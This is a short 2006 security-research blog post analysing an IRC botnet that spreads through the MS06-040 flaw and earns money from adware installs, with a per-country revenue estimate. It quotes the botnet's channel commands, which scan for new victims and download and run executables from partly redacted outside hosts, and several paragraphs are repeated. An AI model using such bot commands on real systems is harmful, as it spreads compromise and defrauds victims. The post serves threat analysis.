On the Economics of Botnets
Friday, September 8. 2006
Running a botnet can be a lucrative way for an attacker to get some money. He can for example rent his bots to a spammer who then uses the SOCKS proxy on the compromised machines to send out tons of spam. Or he can install keylogger or tools to read out the Protected Storage in order to retrieve sensitive information from the victims. Or he can install Adware on those machines and earn some money that way.
Adware seems to be rather lucrative: recently we were monitoring several botnets that uses the MS06-040 (Vulnerability in Server Service Could Allow Remote Code Execution) vulnerability (PoC). One of those botnets used the following channel structure:
The main channel f00 is just used to dispatch all incoming bots. The bots join four different channels:
Ok, and how much can a botherd earn with this kind of attacks? Taking a quick look at the numbers reveals the following result: DollarRevenue pays per install, depending on the country the bot is installed in. Within 24 hours, this botnet compromised a little over 7700 machines. Doing some quick math leads to the following result:
So he earns more than $430 on a single day just with DollarRevenue, presumably a similar sum with the other pieces of Adware. Not a bad income for doing almost no work ;-)
Adware seems to be rather lucrative: recently we were monitoring several botnets that uses the MS06-040 (Vulnerability in Server Service Could Allow Remote Code Execution) vulnerability (PoC). One of those botnets used the following channel structure:
- # f00 #: .ircraw join # scan #,,# frame ## Do #,# a #
- # scan #: .scan netapi 100 3 0 -r -b -s
- # frame #: .download http://XXXsikpgz.com/dl/loadadv518.exe c:\lsas.exe 1 -s
- # Do #: .download http://promo.dollarrevenue.com/webmasterexe/drsmartloadXXXa.exe c:\do.exe 1 -s
- # a #: .download http://YYY.19.23.XXX/~from/taskmgr.exe c:\taskmgr.exe 1 -s
The main channel f00 is just used to dispatch all incoming bots. The bots join four different channels:
- # scan # is used to propagate further, all bots search other victims
- Adware is installed on all compromised machines with the topic of channel # frame #
- Another piece of Adware is installed in channel # Do # - in this case a binary from http://www.dollarrevenue.com/
- Finally, the channel # a # installs an additional binary on all bots.
Ok, and how much can a botherd earn with this kind of attacks? Taking a quick look at the numbers reveals the following result: DollarRevenue pays per install, depending on the country the bot is installed in. Within 24 hours, this botnet compromised a little over 7700 machines. Doing some quick math leads to the following result:
$ grep US 2006-08-28.log | wc -l
998
$ grep CAN 2006-08-28.log | wc -l
20
$ grep GBR 2006-08-28.log | wc -l
103
$ grep CHN 2006-08-28.log | wc -l
756
$ egrep -v "US|CAN|GBR|CHN” 2006-08-28.log | wc -l
5852
998 x $0.3 + 20 x $0.2 + 103 x $0.1 + 756 x $0.01 + 5852 x $0.02 = $438.30
So he earns more than $430 on a single day just with DollarRevenue, presumably a similar sum with the other pieces of Adware. Not a bad income for doing almost no work ;-)
".
